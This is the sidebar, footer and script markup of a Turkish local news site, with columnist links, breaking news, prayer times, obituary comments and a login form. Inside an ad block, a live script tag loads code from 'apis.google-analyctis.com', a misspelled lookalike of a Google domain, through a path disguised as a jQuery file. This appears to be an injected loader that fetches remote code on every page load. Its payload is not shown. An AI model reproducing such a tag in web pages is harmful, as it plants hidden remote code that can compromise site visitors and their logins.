            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/78/sahin-arikan" title="Şahin ARIKAN">Şahin ARIKAN</a></h4>
              <a href="https://www.elbistaninsesi.com/beni-olsaydim-o-ilcenini-reisi-makale,6598.html" title="BENİ OL­SAY­DIM O İLÇENİNİ REİSİ" >BENİ OL­SAY­DIM O İLÇENİNİ REİSİ</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/iliskilerde-ozen-ve-ozensizlik-makale,6597.html" title="İLİŞKİLERDE ÖZEN VE ÖZENSİZLİK" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="https://www.elbistaninsesi.com/iliskilerde-ozen-ve-ozensizlik-makale,6597.html" title="İLİŞKİLERDE ÖZEN VE ÖZENSİZLİK" >İLİŞKİLERDE ÖZEN VE ÖZENSİZLİK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/is-guvenligi-ne-seviyede-makale,6585.html" title="İŞ GÜVENLİĞİ NE SEVİYEDE?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="https://www.elbistaninsesi.com/is-guvenligi-ne-seviyede-makale,6585.html" title="İŞ GÜVENLİĞİ NE SEVİYEDE?" >İŞ GÜVENLİĞİ NE SEVİYEDE?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/12-mart-baglaminda-darbe-polemikleri-ve-icsel-muhasebe-makale,6578.html" title="12 MART&quot; BAĞLAMINDA DARBE POLEMİKLERİ ve İÇSEL MUHASEBE" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/dr-mustafa-kok_1.jpg" alt="Dr. Mustafa KÖK">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/8/dr-mustafa-kok" title="Dr. Mustafa KÖK">Dr. Mustafa KÖK</a></h4>
              <a href="https://www.elbistaninsesi.com/12-mart-baglaminda-darbe-polemikleri-ve-icsel-muhasebe-makale,6578.html" title="12 MART&quot; BAĞLAMINDA DARBE POLEMİKLERİ ve İÇSEL MUHASEBE" >12 MART&quot; BAĞLAMINDA DARBE POLEMİKLERİ ve İÇSEL MUHASEBE</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kadinim-makale,6561.html" title="KA­DI­NIM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="https://www.elbistaninsesi.com/kadinim-makale,6561.html" title="KA­DI­NIM" >KA­DI­NIM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/daglar-makale,6559.html" title="DAĞ­LAR" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="https://www.elbistaninsesi.com/daglar-makale,6559.html" title="DAĞ­LAR" >DAĞ­LAR</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/milli-mucadelemizin-102-yilinda-maras-ve-elbistan-makale,6522.html" title="Milli Mü­ca­de­le­mi­zin 102. Yı­lın­da Maraş Ve El­bis­tan" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="https://www.elbistaninsesi.com/milli-mucadelemizin-102-yilinda-maras-ve-elbistan-makale,6522.html" title="Milli Mü­ca­de­le­mi­zin 102. Yı­lın­da Maraş Ve El­bis­tan" >Milli Mü­ca­de­le­mi­zin 102. Yı­lın­da Maraş Ve El­bis­tan</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/neyleyim-makale,6520.html" title="NEY­LEYİM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Mahir_BaYpYnar.jpg" alt="Mahir Başpınar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/57/mahir-baspinar" title="Mahir Başpınar">Mahir Başpınar</a></h4>
              <a href="https://www.elbistaninsesi.com/neyleyim-makale,6520.html" title="NEY­LEYİM" >NEY­LEYİM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/zen-makale,6503.html" title="ZEN" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Prof._Dr._Mustafa_Necati_DaglY.jpg" alt="Prof. Dr. Mustafa Necati Daglı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/90/prof-dr-mustafa-necati-dagli" title="Prof. Dr. Mustafa Necati Daglı">Prof. Dr. Mustafa Necati Daglı</a></h4>
              <a href="https://www.elbistaninsesi.com/zen-makale,6503.html" title="ZEN" >ZEN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ahlakin-destek-ve-direnci-kac-makale,6418.html" title="Ahlakın destek ve direnci kaç?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/vesikalYk_a_g.jpeg" alt="Ahmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/3/ahmet-gocer" title="Ahmet Göçer">Ahmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/ahlakin-destek-ve-direnci-kac-makale,6418.html" title="Ahlakın destek ve direnci kaç?" >Ahlakın destek ve direnci kaç?</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/guncel/adiyamandaki-deprem-elbistanda-da-hissedildi-h73156.html" title="Adıyaman’daki deprem, Elbistan’da da hissedildi" >Adıyaman’daki deprem, Elbistan’da da hissedildi</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/ustune-catidan-kar-kutlesi-dusen-adam-hastanelik-oldu-h72632.html" title="Üstüne çatıdan kar kütlesi düşen adam hastanelik oldu" >Üstüne çatıdan kar kütlesi düşen adam hastanelik oldu</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/hz-hamza-cami-icin-hayirseverlerden-destek-talebi-h72569.html" title="Hz. Hamza Cami için hayırseverlerden destek talebi" >Hz. Hamza Cami için hayırseverlerden destek talebi</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/edibe-odacioglu-87-yasinda-h71859.html" title="Edibe Odacıoğlu 87 yaşında" >Edibe Odacıoğlu 87 yaşında</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/polisten-motosiklet-suruculerine-hayat-kurtaracak-hediye-h71612.html" title="Polisten motosiklet sürücülerine hayat kurtaracak hediye" >Polisten motosiklet sürücülerine hayat kurtaracak hediye</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>04:35</td>
            <td>06:00</td>
            <td>12:39</td>
            <td>16:16</td>
            <td>19:09</td>
            <td>20:27</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="https://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hatun-ayse-goturler-86-yasinda-h73401.html#comment_377130" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hatun-ayse-goturler-86-yasinda-h73401.html#comment_377128" title="" >Merhume Allah&#39;tan rahmet dilerim Allah...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/feti-elbozan-h73400.html#comment_377127" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/anma-azmi-pamuk-h73399.html#comment_377126" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hatun-ayse-goturler-86-yasinda-h73401.html#comment_377125" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/feti-elbozan-h73400.html#comment_377124" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/feti-elbozan-h73400.html#comment_377123" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hatun-ayse-goturler-86-yasinda-h73401.html#comment_377122" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/feti-elbozan-h73400.html#comment_377121" title="" >ALLAH rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/anma-harun-gurbuz-h73263.html#comment_377120" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hatun-ayse-goturler-86-yasinda-h73401.html#comment_377119" title="" >CENÂB-I ALLAH RAHMET EYLEYİP CENNETİYLE...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/abdulkadir-ciftci-78-yasinda-h73398.html#comment_377118" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/feti-elbozan-h73400.html#comment_377117" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/feti-elbozan-h73400.html#comment_377116" title="" >ALLAH Rahmet eylesin mekanın cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/feti-elbozan-h73400.html#comment_377115" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hatun-ayse-goturler-86-yasinda-h73401.html#comment_377114" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hatun-ayse-goturler-86-yasinda-h73401.html#comment_377113" title="" >Hakkın rahmetine kavuşan merhum/merhumeye...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hatun-ayse-goturler-86-yasinda-h73401.html#comment_377112" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/hatun-ayse-goturler-86-yasinda-h73401.html#comment_377109" title="" >babamın dayısının kızıydı. Sevdiğim...</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/feti-elbozan-h73400.html#comment_377108" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
              </ul>
    </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="https://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" selected>09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" selected>Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2022" selected>2022</option>
                <option value="2021" >2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2022 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="https://www.elbistaninsesi.com/rss"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Hakim ve savcılar, Suriye&#039;ye giden PÖH&#039;leri uğurladı" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="41242d23283235202f282f3224322826203b243524322801262c20282d6f222e2c">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="https://www.elbistaninsesi.com/index.php?m=login&amp;rd=https%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fhakim-ve-savcilar-suriye-ye-giden-poh-leri-ugurladi-h73412.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="https://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="https://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('73412', 'haber', '');
	
</script>

    	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
